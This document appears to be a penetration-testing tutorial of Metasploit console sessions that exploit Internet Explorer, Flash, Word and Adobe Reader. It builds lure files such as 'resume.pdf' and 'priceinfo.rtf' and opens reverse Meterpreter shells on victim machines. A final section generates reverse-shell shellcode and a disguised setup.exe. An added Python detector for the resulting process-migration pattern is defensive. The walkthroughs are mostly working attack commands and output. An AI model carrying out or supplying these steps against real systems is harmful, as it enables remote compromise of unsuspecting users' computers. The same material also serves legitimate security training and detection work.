1. Internet Explorer execCommand use-after-free vulnerability

msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit (ie_execcommand_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload => windows/meterpreter/reverse_tcp
msf exploit (ie_execcommand_uaf) > show options
Module options (exploit/windows/browser/ie_execcommand_uaf):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT                      yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connection.
   SSLCert                      no        Path to custom SSL Certificate.
   SSLVersion  SSL3             no        Specify the version of SSL.
   URIPATH                      no        The URI to use for this exploit.

Payload options (exploit/windows/browser/ie_execcommand_uaf):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique : seh, thread, process, none
   LHOST                      yes       The listen address.
   LPORT     4444             yes       The listen port.

Exploit Target:

   Id  Name
   --  ----
   0   Automatic
msf exploit (ie_execcommand_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit (ie_execcommand_uaf) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf exploit (ie_execcommand_uaf) > set URIPATH /
URIPATH => /
msf exploit (ie_execcommand_uaf) > exploit
[*] exploit running as background job
[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL : http://192.168.1.101:80/
[*] Server started
msf exploit (ie_execcommand_uaf) >[*] ie_execcommand_uaf) Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_uaf - Redirecting to page.html
[*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_uaf - loading page.html
[*] 192.168.1.101 ie_execcommand_uaf - using JRE ADP
[*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_uaf - Redirecting to page.html
[*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_uaf - Loading page.html
[*] 192.168.1.101 ie_execcommand_uaf - Mozilla/5.0 [compatible :MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0]
[*] 192.168.1.101 ie_execcommand_uaf - Redirecting to page.html
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 => 192.168.1.100:63670) at 2012-05-09 18:24:44 
[*] Session ID 1 (192.168.1.101:4444 => 192.168.1.100:63670) processing InitialAutoRun Script migrate -1
[*] Current server process : iexplore.exe (5476)
[*] Spawning notepad.exe process to migrate to
[*] Migrating to 4768
[*] Successfully migrated to process
msf exploit (ie_execcommand_uaf) > sessions -l
msf exploit (ie_execcommand_uaf) > sessions -i 1
[*] Starting interaction with 1
meterpreter > sysinfo
Computer : TRACEWIN
OS : Windows XP (Build 6000, Service Pack 3)
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
=========================================================================

2. Adobe Flash Player new function invalid pointer use

msf  > use exploit/windows/fileformat/adobe_flashplayer_newfunction
msf  exploit (adobe_flashplayer_newfunction) > set PAYLOAD windows/meterpreter/reverse_tcp 
msf  exploit (adobe_flashplayer_newfunction) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf  exploit (adobe_flashplayer_newfunction) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf  exploit (adobe_flashplayer_newfunction) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL: http://192.168.1.101:8080/filename
[*] Server started.
msf  exploit (adobe_flashplayer_newfunction) >
[*] Sending crafted PDF */SWF to 192.168.1.100:1039
[*] Sending stage (748032 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:1040)
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.101:1040) processing InitialAutoRunScript migrate -f
[*] Current server process : firefox.exe (3644)
[*] Spawning a notepad.exe host process
[*] Migrating into process ID 3900
[*] New server process: notepad.exe (3900)

msf  exploit (adobe_flashplayer_newfunction) > sessions  -l
Active sessions
Id		Type			Information		Connection
1		meterpreter		ERIC-FD2123B3C	192.168.1.100:1040
msf  exploit (adobe_flashplayer_newfunction) > sessions  -i 1
meterpreter>
============================================================================

3. Microsoft Word RTF stack buffer overflow

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 

msf  exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required   Description
   ----      ---------------  --------   -----------
   FILENAME   msf.rtf          yes       The file name.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh..
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME priceinfo.rtf
FILENAME => priceinfo.rtf

msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.56.101

[*] Creating 'priceinfo.rtf' file ...

[+] priceinfo.rtf stored at /root/.msf4/local/priceinfo.rtf
Sending stage (752128 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:57031) at 2011-11-13 23:16:20 +0530

[*] Session ID 2 (192.168.56.101:4444 -> 192.168.56.1:57031) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: WINWORD.EXE (5820)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 5556
[+] Successfully migrated to process
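
The three sessions above end the same way: the exploited application (Internet Explorer, Firefox, Word) connects back to port 4444 and spawns notepad.exe as a migration target. The following added example, which is not part of the original page, shows detection logic for that pattern over constructed process-creation and network-connection events. The field names are modeled on Sysmon Event IDs 1 and 3; the event data, allowlists, file paths and function names are assumptions.

```python
import ntpath
from collections import defaultdict

# Assumed allowlists for this example; tune them for a real environment.
CONTENT_APPS = {"iexplore.exe", "firefox.exe", "winword.exe", "acrord32.exe"}
UNEXPECTED_CHILDREN = {"notepad.exe"}   # migration target seen in the transcripts
WEB_PORTS = {80, 443}

# Constructed events (not real telemetry). PIDs and addresses echo the transcripts.
SAMPLE_EVENTS = [
    {"EventID": 3, "ProcessId": 5820, "Image": r"C:\Office\WINWORD.EXE",
     "DestinationIp": "192.168.56.101", "DestinationPort": 4444},
    {"EventID": 1, "ProcessId": 5556, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessId": 5820, "ParentImage": r"C:\Office\WINWORD.EXE"},
    {"EventID": 1, "ProcessId": 6100, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessId": 1500, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessId": 3644, "Image": r"C:\Mozilla\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 4768, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessId": 5476, "ParentImage": r"C:\IE\iexplore.exe"},
]

def exe(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return ntpath.basename(path or "").lower()

def analyse(events):
    """Map PID of each suspicious content app to its image, reasons and severity."""
    findings = defaultdict(lambda: {"image": None, "reasons": []})
    for ev in events:
        image = exe(ev.get("Image"))
        parent = exe(ev.get("ParentImage"))
        if ev["EventID"] == 1 and parent in CONTENT_APPS and image in UNEXPECTED_CHILDREN:
            hit = findings[ev["ParentProcessId"]]
            hit["image"] = parent
            hit["reasons"].append(f"spawned {image} (pid {ev['ProcessId']})")
        elif ev["EventID"] == 3 and image in CONTENT_APPS \
                and ev["DestinationPort"] not in WEB_PORTS:
            hit = findings[ev["ProcessId"]]
            hit["image"] = image
            hit["reasons"].append(f"outbound to {ev['DestinationIp']}:{ev['DestinationPort']}")
    for hit in findings.values():
        kinds = {reason.split()[0] for reason in hit["reasons"]}
        # Both signals on one process match the full pattern in the transcripts.
        hit["severity"] = "high" if kinds == {"spawned", "outbound"} else "medium"
    return dict(findings)

if __name__ == "__main__":
    for pid, hit in analyse(SAMPLE_EVENTS).items():
        print(pid, hit["image"], hit["severity"], "; ".join(hit["reasons"]))
```

A notepad.exe started from explorer.exe and a browser connection to port 443 are deliberately left unflagged, so the rule fires only on the parent-child and port combinations the transcripts show.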
==============================================================

4. Adobe Reader U3D memory corruption

Msf  > use exploit/windows/adobe_reader_u3d
Msf exploit (adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload =>  windows/meterpreter/reverse_tcp
Msf exploit (adobe_reader_u3d) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
Msf exploit (adobe_reader_u3d) > set filename resume.pdf
Filename => resume.pdf
Msf exploit (adobe_reader_u3d) > exploit
[*] Creating resume.pdf file
[+] resume.pdf stored at /root/.msf4/local/resume.pdf

Now we need to create a listener to handle the reverse connection when the malicious file is opened on the victim's machine. Let us see how it is done in the next few steps:
Msf exploit (adobe_reader_u3d) > use exploit/multi/handler
Msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload =>  windows/meterpreter/reverse_tcp
Msf exploit (handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
Msf exploit (handler) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.101:1074)

Meterpreter > sysinfo
Computer 	: HP-PC
OS		: Windows XP (Build 2600, Service Pack 2).
Meterpreter > shell
Process 256 created.
Channel 1 created.
Microsoft Windows XP (Version 5.1.2600)
C:\Documents and Settings\John\Desktop>
====================================================================

5. Generating binary and shell code from msfpayload

root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 o
So we have set up LHOST and LPORT according to our needs. The next step is to generate C code for our customized shell (the displayed output has been shortened to fit):
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=4441 C

/*
 * windows/shell/reverse_tcp - 290 bytes (stage 1)
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.56.101, LPORT=4441, 
 * ReverseConnectRetries=5, EXITFUNC=process, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = /* shellcode bytes omitted */
Notice the capital C parameter on the command line. The output is complete shellcode in C, which we can use in our own exploit development code. Alternatively, we also have the option to generate code in Ruby and Perl.
Let us proceed to the next step of generating a binary executable for the shellcode which can be used in our client-side attack.
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 X > .local/setup.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.56.101"}

Now that our executable is ready, we will have to set up a listener in our msfconsole to listen for a back connection when the target executes this exe file.
msf > use multi/handler

msf  exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

msf  exploit(handler) > set LHOST 192.168.46.101

msf  exploit(handler) > exploit

[-] Handler failed to bind to 192.168.46.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler


